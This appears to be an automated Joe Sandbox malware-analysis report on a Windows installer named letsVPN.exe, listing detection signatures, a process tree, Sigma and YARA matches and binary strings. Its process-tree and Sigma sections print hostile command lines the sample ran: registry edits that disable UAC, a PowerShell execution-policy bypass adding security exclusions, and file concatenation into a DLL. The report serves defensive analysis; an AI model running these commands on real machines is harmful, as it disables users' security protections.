Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
letsVPN.exe

Overview

General Information

Sample name:letsVPN.exe
Analysis ID:1582024
MD5:ef0f5b020ea3238a98642cd7b56d84bb
SHA1:9bfb209e7d43739cc9dea530680b0c4ecdbf5981
SHA256:abf9a5632221e9fe423c9eeeb4c205497bf5bb1ff4aad8561609d81eaa82976e
Tags:exeuser-aachum
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies the DNS server
Modifies the windows firewall
Performs a network lookup / discovery via ARP
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sample is not signed and drops a device driver
Uses cmd line tools excessively to alter registry or file data
Uses ipconfig to lookup or modify the Windows network settings
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Yara detected Generic Downloader
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Tap Installer Execution
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • letsVPN.exe (PID: 1132 cmdline: "C:\Users\user\Desktop\letsVPN.exe" MD5: EF0F5B020EA3238A98642CD7B56D84BB)
    • cmd.exe (PID: 716 cmdline: C:\Windows\system32\cmd.exe /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 6312 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • netsh.exe (PID: 1340 cmdline: "C:\Windows\System32\netsh.exe" exec C:\ProgramData\s1qGS.xml MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1656 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\06VAP.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 4824 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 6252 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 5896 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • cmd.exe (PID: 964 cmdline: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\Jm42a\Q4nO1~16\s+C:\ProgramData\Jm42a\Q4nO1~16\a C:\ProgramData\Jm42a\Q4nO1~16\base.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 2580 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • mmc.exe (PID: 5172 cmdline: C:\Windows\system32\mmc.exe -Embedding MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)
    • sinaplayer_service.exe (PID: 6368 cmdline: "C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe" MD5: 68411B35F7B40B45AFC4A60A2681549D)
      • cmd.exe (PID: 7176 cmdline: C:\Windows\system32\cmd.exe /c ipconfig /all MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 7248 cmdline: ipconfig /all MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • mmc.exe (PID: 5904 cmdline: C:\Windows\system32\mmc.exe -Embedding MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)
    • letsvpn-latest.exe (PID: 4488 cmdline: "C:\ProgramData\letsvpn-latest.exe" MD5: 9F5F358AA1A85D222AD967F4538BC753)
      • powershell.exe (PID: 7632 cmdline: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tapinstall.exe (PID: 8044 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
        • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tapinstall.exe (PID: 8096 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
        • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tapinstall.exe (PID: 7256 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
        • conhost.exe (PID: 5272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2528 cmdline: cmd /c netsh advfirewall firewall Delete rule name=lets MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 2724 cmdline: netsh advfirewall firewall Delete rule name=lets MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 7324 cmdline: cmd /c netsh advfirewall firewall Delete rule name=lets.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 5936 cmdline: netsh advfirewall firewall Delete rule name=lets.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 7412 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 6596 cmdline: netsh advfirewall firewall Delete rule name=LetsPRO.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 6744 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsPRO MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 6304 cmdline: netsh advfirewall firewall Delete rule name=LetsPRO MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 5276 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsVPN MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 4032 cmdline: netsh advfirewall firewall Delete rule name=LetsVPN MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • LetsPRO.exe (PID: 6956 cmdline: "C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework MD5: 3530CB1B45FF13BA4456E4FFBCAE6379)
        • LetsPRO.exe (PID: 1280 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework MD5: 56162A01D3DE7CB90EB9A2222C6B8F24)
      • LetsPRO.exe (PID: 7484 cmdline: "C:\Program Files (x86)\letsvpn\LetsPRO.exe" MD5: 3530CB1B45FF13BA4456E4FFBCAE6379)
        • LetsPRO.exe (PID: 4820 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" MD5: 56162A01D3DE7CB90EB9A2222C6B8F24)
          • cmd.exe (PID: 7384 cmdline: "cmd.exe" /C ipconfig /all MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ipconfig.exe (PID: 7796 cmdline: ipconfig /all MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
          • cmd.exe (PID: 7792 cmdline: "cmd.exe" /C route print MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ROUTE.EXE (PID: 7640 cmdline: route print MD5: C563191ED28A926BCFDB1071374575F1)
          • cmd.exe (PID: 8084 cmdline: "cmd.exe" /C arp -a MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ARP.EXE (PID: 6360 cmdline: arp -a MD5: 4D3943EDBC9C7E18DC3469A21B30B3CE)
  • svchost.exe (PID: 8184 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • drvinst.exe (PID: 7284 cmdline: DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{7c77b43b-9dea-844d-b268-70c5b13694a4}\oemvista.inf" "9" "4d14a44ff" "0000000000000160" "WinSta0\Default" "0000000000000148" "208" "c:\program files (x86)\letsvpn\driver" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 7232 cmdline: DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "0000000000000160" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
  • svchost.exe (PID: 7068 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2360 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6028 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • WmiApSrv.exe (PID: 7624 cmdline: C:\Windows\system32\wbem\WmiApSrv.exe MD5: 9A48D32D7DBA794A40BF030DA500603B)
  • LetsPRO.exe (PID: 7764 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent MD5: 56162A01D3DE7CB90EB9A2222C6B8F24)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dllJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    C:\Program Files (x86)\letsvpn\Update.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dllJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          Process Memory Space: letsvpn-latest.exe PID: 4488JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            61.2.LetsPRO.exe.68890000.21.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

              Sigma Signatures

              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\letsvpn-latest.exe" , ParentImage: C:\ProgramData\letsvpn-latest.exe, ParentProcessId: 4488, ParentProcessName: letsvpn-latest.exe, ProcessCommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , ProcessId: 7632, ProcessName: powershell.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, ProcessId: 4820, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LetsPRO
              Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, ProcessId: 4820, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwgfpj3u.40z.ps1
              Sigma detected: Suspicious Copy From or To System Directory
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\Jm42a\Q4nO1~16\s+C:\ProgramData\Jm42a\Q4nO1~16\a C:\ProgramData\Jm42a\Q4nO1~16\base.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\Jm42a\Q4nO1~16\s+C:\ProgramData\Jm42a\Q4nO1~16\a C:\ProgramData\Jm42a\Q4nO1~16\base.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\letsVPN.exe", ParentImage: C:\Users\user\Desktop\letsVPN.exe, ParentProcessId: 1132, ParentProcessName: letsVPN.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\Jm42a\Q4nO1~16\s+C:\ProgramData\Jm42a\Q4nO1~16\a C:\ProgramData\Jm42a\Q4nO1~16\base.dll, ProcessId: 964, ProcessName: cmd.exe
              Sigma detected: Tap Installer Execution
              Source: Process startedAuthor: Daniil Yugoslavskiy, Ian Davis, oscd.community: Data: Command: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, CommandLine: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, NewProcessName: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, OriginalFileName: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, ParentCommandLine: "C:\ProgramData\letsvpn-latest.exe" , ParentImage: C:\ProgramData\letsvpn-latest.exe, ParentProcessId: 4488, ParentProcessName: letsvpn-latest.exe, ProcessCommandLine: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, ProcessId: 8044, ProcessName: tapinstall.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\letsvpn-latest.exe" , ParentImage: C:\ProgramData\letsvpn-latest.exe, ParentProcessId: 4488, ParentProcessName: letsvpn-latest.exe, ProcessCommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , ProcessId: 7632, ProcessName: powershell.exe
              Sigma detected: Suspicious Network Command
              Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: C:\Windows\system32\cmd.exe /c ipconfig /all, CommandLine: C:\Windows\system32\cmd.exe /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\letsVPN.exe", ParentImage: C:\Users\user\Desktop\letsVPN.exe, ParentProcessId: 1132, ParentProcessName: letsVPN.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ipconfig /all, ProcessId: 716, ProcessName: cmd.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2580, ProcessName: svchost.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: letsVPN.exeVirustotal: Detection: 32%Perma Link
              Machine Learning detection for sample
              Source: letsVPN.exeJoe Sandbox ML: detected
              Source: C:\ProgramData\letsvpn-latest.exeWindow detected: < &BackI &AgreeCancelNullsoft Install System v3.10 Nullsoft Install System v3.10License AgreementPlease review the license terms before installing letsvpn.Press Page Down to see the rest of the agreement.LetsVPN Terms of ServiceThese Terms of Service ("the Terms") govern your use of LetsVPN Services therefore we kindly ask you to carefully read them when visiting LetsVPN website before you register download install and use LetsVPN Services which include the LetsVPN software LetsVPN mobile applications and any services that LetsVPN (LetsVPN we us or our ) provides through our software application or otherwise (all of which collectively are referred as the LetsVPN Services).Please note that the Terms constitute a legally binding agreement (the Agreement) between you and LetsVPN. By visiting the website registering for installing and/or using LetsVPN Services on any platform or device you agree to be bound by these Terms. It is only under these Terms that LetsVPN allows visitors / users (the users) to use LetsVPN Services. If you do not agree to these Terms or any provisions hereof please do not install and do not use our software our mobile application and/or any of our products or services.Intellectual Property RightsThe website and all of the materials contained within LetsVPN are protected by intellectual property right laws. All of the materials and content include but not limited to the graphics design scripts logos page headers images button icons appearance downloads and any other information used to promote or provide the Services. All copyright trademarks design rights patents and any other intellectual property rights (whether registered or unregistered) for the Services and all of the materials contained within our services are either owned by us licensed to us or we are entitled to use it. All such rights are reserved.The Scope of Software LicensingA. Users can install use display and run the software on PC and mobile phones (same account support different devices).B. Reserved rights: All other rights not expressly authorized are still owned by LetsVPN team. Users must obtain additional written consent from LetsVPN team when using other rights.C. Except as expressly provided in this Agreement this Agreement does not stipulate the relevant Terms of Service for LetsVPN or other services of the partner using the Software. For these services there may be separate terms of service to regulate the user. Please be aware of and confirm separately when using LetsVPN Services. If the user uses the Services it is deemed to be an acceptance of the relevant Terms of Service.User InstructionsA. Users agree to obtain LetsVPN software and use LetsVPN Services from official channels; bear all losses and liabilities caused by him/herself including but not limited to: loss of account password account dispute with others etc.B. LetsVPN Accounta. You understand that it is your responsibility to keep your LetsVPN account information confidentia
              Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.PerformanceCounter/net461-Release/System.Diagnostics.PerformanceCounter.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2412144630.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdbSHA256h source: letsvpn-latest.exe, 00000015.00000003.2402252974.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ObjectModel\4.0.11.0\System.ObjectModel.pdbX+r+ d+_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2457151708.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2458361290.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\git\OSS\notifyicon-wpf\Hardcodet.NotifyIcon.Wpf\Source\NotifyIconWpf\obj\Release\Hardcodet.Wpf.TaskbarNotification.pdb source: letsvpn-latest.exe, 00000015.00000003.2351020724.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb( source: letsvpn-latest.exe, 00000015.00000003.2425718257.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb source: letsvpn-latest.exe, 00000015.00000003.2449120272.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdb source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, tapinstall.exe, 00000021.00000000.2603866703.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000021.00000002.2606131178.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000000.2607796952.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000002.2660016264.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000029.00000000.2665972836.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000029.00000002.2668002400.00007FF796191000.00000020.00000001.01000000.00000017.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdb source: letsvpn-latest.exe, 00000015.00000003.2465608542.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem\4.0.3.0\System.IO.FileSystem.pdb8)R) D)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2430089756.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdbSHA256T source: letsvpn-latest.exe, 00000015.00000003.2434348436.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Net.Http\netfx\System.Net.Http.pdb source: letsvpn-latest.exe, 00000015.00000003.2444994668.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdb source: letsvpn-latest.exe, 00000015.00000003.2347348631.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.ResourceManager\4.0.1.0\System.Resources.ResourceManager.pdb source: letsvpn-latest.exe, 00000015.00000003.2460388898.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb* source: letsvpn-latest.exe, 00000015.00000003.2413088913.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.CodeDom/net461-Release/System.CodeDom.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2395719645.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2482115637.0000000003102000.00000004.00000020.00020000.00000000.sdmp
